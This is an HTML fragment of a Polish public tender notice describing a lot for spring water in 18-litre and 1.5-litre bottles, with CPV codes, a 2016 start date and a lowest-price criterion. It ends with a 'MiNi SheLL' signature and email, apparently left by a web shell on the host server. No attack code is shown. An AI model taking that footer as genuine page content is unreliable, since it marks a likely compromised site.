<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Woda żródlana.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda źródlana nie gazowana  - niskomineralizowana  z dozownikiem w butelkach o pojemności   18 l.

litry

     1500
Woda źródlana nie gazowana  - niskomineralizowana   w butelkach  plastikowych o pojemności   1,5 l.

szt.

90.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com